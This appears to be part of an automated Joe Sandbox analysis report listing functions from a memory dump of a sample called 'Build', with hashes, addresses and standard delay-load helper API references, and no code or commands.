Instruction ID: 07fbbe332cf24f9e3273819393dcd395cbc918bf0700d117ae2d6cc4502d1eb6
Opcode Fuzzy Hash: 90bd4e655608b83192e6dd50945062a1bb46e4d4822404765ee42c3e73b05bd5
Instruction Fuzzy Hash: 8EB012863BC143AC324CB14A9C02C3F02DCC2C1B10330C6FAF40CC0140D8441C440031

Function 00B606C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 907a349282de10b390fe7788b581e6e9118c3c985b3618b887b6cd0477fb2545
Instruction ID: 970c24b0043009f611c837528ce60102324823f0b11e02420b20b007ec785de8
Opcode Fuzzy Hash: 907a349282de10b390fe7788b581e6e9118c3c985b3618b887b6cd0477fb2545
Instruction Fuzzy Hash: EDB0128A3BC103AC3108F14A9C42C3F02DCD2C1B10330C5FAF40CC0140D8441C000131

Function 00B6067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45fba5b66bb7efb50c20f073a54fc8633256211361f16eab1849da8f9c6e1885
Instruction ID: 3633ffba690b860508bbb25e63bb8fdf765d5b73d3c4bdd45c16b75555addc39
Opcode Fuzzy Hash: 45fba5b66bb7efb50c20f073a54fc8633256211361f16eab1849da8f9c6e1885
Instruction Fuzzy Hash: 8EB012863BC003BD311871469C02C3F02DCD2C1B10330C6FAF408D004098441C000035

Function 00B6072D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b7c2b3ede6f442c429b4f164642faa307c2677a3a4572da3a3fe0011b12587cc
Instruction ID: 95bcc2502a08f5c3d20488c6e862a5088ff7ec8df1a0891c6d0e6f689ac6fd5d
Opcode Fuzzy Hash: b7c2b3ede6f442c429b4f164642faa307c2677a3a4572da3a3fe0011b12587cc
Instruction Fuzzy Hash: DFB0129A3BD103AD3288B24A9C02C3F02DCC2C1B10330C6FAF40CC0040D8441C400031

Function 00B60719 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0a881d288cc563aef4df81d6c5d908bc8e8214455acbef9fa9bfa1cedee5aca2
Instruction ID: 4f3d7f749585d40785f4a86c3ecce673c0c1191fdea675089e944a540fbf8777
Opcode Fuzzy Hash: 0a881d288cc563aef4df81d6c5d908bc8e8214455acbef9fa9bfa1cedee5aca2
Instruction Fuzzy Hash: F3B012E63BC003AC3108B14B9C02C3F02DCD2C1B10330C5FAF40CC0040D8441C000031

Function 00B6070F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ecdd5a0170a1a9e3bfc2922ee505d47647763d53d574fce7b96cc154a15df66b
Instruction ID: 8f73441739e7a6dfe72b7cc6aa3d027ecfcc61b26409c7b3d7c483a0c9ec516b
Opcode Fuzzy Hash: ecdd5a0170a1a9e3bfc2922ee505d47647763d53d574fce7b96cc154a15df66b
Instruction Fuzzy Hash: AFB012E63BC003AC3108B14A9D02C3F02DCC2C1B10330C5FAF80DC0040D8441D010031

Function 00B6075F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B6068E

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d465c5c22beabeb01db1789495fb4edd74463096b2cbd12bbfecbf43abe07830
Instruction ID: 9c6e4cdc9e11def28f548bca11c764174d01c20c13ba2ddfcb90a48efecd358c
Opcode Fuzzy Hash: d465c5c22beabeb01db1789495fb4edd74463096b2cbd12bbfecbf43abe07830
Instruction Fuzzy Hash: 89B012963BC003AC3108B14A9D02C3F02DCC2C1B10330C5FAF80CC0040D8441C010031

Function 00B608F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 593e70ea8a169666980ff96c9d53dbe0e93dac09dd076f5fdbf22b4770500695
Instruction ID: 9bf82e2b8117d7a1a5baf427e2bc10884f91a46257ff0478b7f3c77703891487
Opcode Fuzzy Hash: 593e70ea8a169666980ff96c9d53dbe0e93dac09dd076f5fdbf22b4770500695
Instruction Fuzzy Hash: 72B092822BC002AC2108B14A9C02D3B12E8D181B1032086EAF408C1041D84418400035

Function 00B608C4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 38b94ba024b0cb83a56b9bed47de20b4dcf5773e6e02e789d6dbba7a121b1cb2
Instruction ID: dbf220564ceac714409d799a743f1c9fee76f2b87289678b505e7959024903e8
Opcode Fuzzy Hash: 38b94ba024b0cb83a56b9bed47de20b4dcf5773e6e02e789d6dbba7a121b1cb2
Instruction Fuzzy Hash: 75B092823AC202AC2608B14A5C42C3B12E8C181B1032086EAF408C1181D8841C844031

Function 00B608CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B608A7

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 532cf90bdb4fb3f6eaf9546f46c670c1ccf91cfd1333e3dcb5be59ac95930a10
Instruction ID: 9971113321ced3053b454e828b9f3e703e882ed4f8446649c27264e3029c7de6
Opcode Fuzzy Hash: 532cf90bdb4fb3f6eaf9546f46c670c1ccf91cfd1333e3dcb5be59ac95930a10
Instruction Fuzzy Hash: 19B092822EC102AC2108B14A5C42D3B12E8D181B1032085EAF408C1141D8841C400131

Function 00B609EA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 44face6a6feed2198207f8e847f4e4fa6921788cad0414b9ea5382eb4112b49b
Instruction ID: 78d016c08cfc5aaa8ae8273fa2563de8911b3660c1e52e44fa04fc553635f74b
Opcode Fuzzy Hash: 44face6a6feed2198207f8e847f4e4fa6921788cad0414b9ea5382eb4112b49b
Instruction Fuzzy Hash: 03B012C73FC003BC3508318EAE02C3701CCC8C1B18730C6FAF418C00829C551C010131

Function 00B60A84 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6665a020c9af5ce46227a81bbf734ee361f5540a10931394b884dc6c32658a32
Instruction ID: 5f735d72697884d12403e5b3e5878e9953c21c065e89b85afc5c776431d863aa
Opcode Fuzzy Hash: 6665a020c9af5ce46227a81bbf734ee361f5540a10931394b884dc6c32658a32
Instruction Fuzzy Hash: 7EB012C23FC202FC334971DA9C12C3701CCD4C1B10330C6FAF408C0140D8441C410031

Function 00B60A8E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 37ff660716809f35c8647326eaff66bcb49ecc66812c5458ec1f78ca0d365ab9
Instruction ID: e3bbd060c10204639aaf543170918db23d8b16abe9f8a32eba41ad01398028bf
Opcode Fuzzy Hash: 37ff660716809f35c8647326eaff66bcb49ecc66812c5458ec1f78ca0d365ab9
Instruction Fuzzy Hash: F4B012C33FC102FC320971DA9C12C3701CCD4C2B10330C5FAF808C1140D8441C060031

Function 00B60A23 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b49ca7d22572fdefa46d181861331b78c1202349392a985a98435e500290add3
Instruction ID: 14847ad4105d7ed5f7b7cd6abf53d360d6bb85be1f70372c44c8d561bc683ed2
Opcode Fuzzy Hash: b49ca7d22572fdefa46d181861331b78c1202349392a985a98435e500290add3
Instruction Fuzzy Hash: 01B012C33FC002EC3508718EAD02D3701DCC0C1B10330C6FAF80CC1181D8441C040131

Function 00B60A05 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 082eded998e6dd20844d245d24b9894d19f142c20eeb1c89d4c7fe55cb627c2b
Instruction ID: 358aa0474ed455500fdb11273113b5f861d965fb34d9dd58cd32f3a57d02fc30
Opcode Fuzzy Hash: 082eded998e6dd20844d245d24b9894d19f142c20eeb1c89d4c7fe55cb627c2b
Instruction Fuzzy Hash: CCB012C23FC102AC3608719EAD02D3B01CCC0C1B10330C7FAF40CC02C1D8451C480131

Function 00B60A0F Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B609FC

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c0804f586076c1bc92e2f1df45c780baee2740ef8eeae52a42674ef9f4f16392
Instruction ID: 14d84e67b11576110217b1d29fbded247b39e0c79fa5d84ced2d29ccd40272e0
Opcode Fuzzy Hash: c0804f586076c1bc92e2f1df45c780baee2740ef8eeae52a42674ef9f4f16392
Instruction Fuzzy Hash: CAB012C23FC002AC3508719EAE02D3B01CCC0C1B10330C6FAF40CC0181D8451C050131

Function 00B60A70 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B60A5D

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
